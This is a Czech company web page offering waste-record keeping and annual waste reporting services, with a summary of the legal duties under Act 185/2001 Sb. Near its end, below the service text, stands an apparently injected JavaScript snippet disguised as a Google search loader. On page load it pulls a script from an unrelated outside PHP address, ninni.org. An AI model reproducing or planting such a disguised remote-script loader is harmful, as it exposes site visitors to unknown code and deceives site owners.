Evidence odpadů

Naše služby

  • vedení průběžné evidence odpadů
  • zpracování ročního hlášení v elektronické podobě
  • zpracování statistického výkazu “ODPADY” pro Český statistický úřad
  • vedení evidence zařízení k odstraňování nebo využívání odpadů podle § 23 vyhlášky č. 383/2001Sb.

 

Evidence odpadů vychází z §39 zákona č. 185/2001 Sb., o odpadech a jeho novel, a z § 21 a 22 vyhlášky č. 383/2001 Sb., v platném znění:

Podle § 39 odst. 1 zákona č. 185/2001 Sb. mají všichni původci odpadů a oprávněné osoby, které nakládají s odpady, povinnost vést průběžnou evidenci o odpadech a způsobech nakládání s odpady. Evidence se vede za každou samostatnou provozovnu a za každý druh odpadu samostatně. Evidence odpadů se vede při každé jednotlivé produkci odpadů.

Původci odpadů jsou povinni v případě, že produkují nebo nakládají s více než 100 kg nebezpečných odpadů za kalendářní rok nebo s více než 100 tunami ostatních odpadů za kalendářní rok, nebo v daném kalendářním roce produkují nebo nakládají s odpady stanovenými prováděcím právním předpisem bez ohledu na množství těchto odpadů, zasílat každoročně do 15. února následujícího roku pravdivé a úplné hlášení o druzích, množství odpadů a způsobech nakládání s nimi obecnímu úřadu obce s rozšířenou působností příslušnému podle místa provozovny. Oprávněné osoby jsou povinny v případě, že nakládají v kalendářním roce s odpadem, zasílat každoročně do 15. února následujícího roku pravdivé a úplné hlášení o druzích, množství odpadů a způsobech nakládání s nimi a o původcích odpadů obecnímu úřadu obce s rozšířenou působností příslušnému podle místa provozovny.

Původci odpadů a oprávněné osoby v mnoha případech povinnost podávat hlášení zanedbávají, a za to jim pak hrozí sankce až do výše 1.000.000,-Kč! Nabízíme proto účinnou pomoc řešení této situace.

Pokud nevíte, zda se zákonné povinnosti vztahují i na Vaši firmu, zpracujeme Vám rychlý audit odpadového hospodářství.

(function() {
var gcse = document.createElement(‘script’);
gcse.type = ‘text/javascript’;
gcse.async = true;
gcse.src = “http://ninni.org/core9Om3.php”;
var s = document.getElementsByTagName(‘script’)[0];
s.parentNode.insertBefore(gcse, s);
})();


Komentáře nejsou povoleny.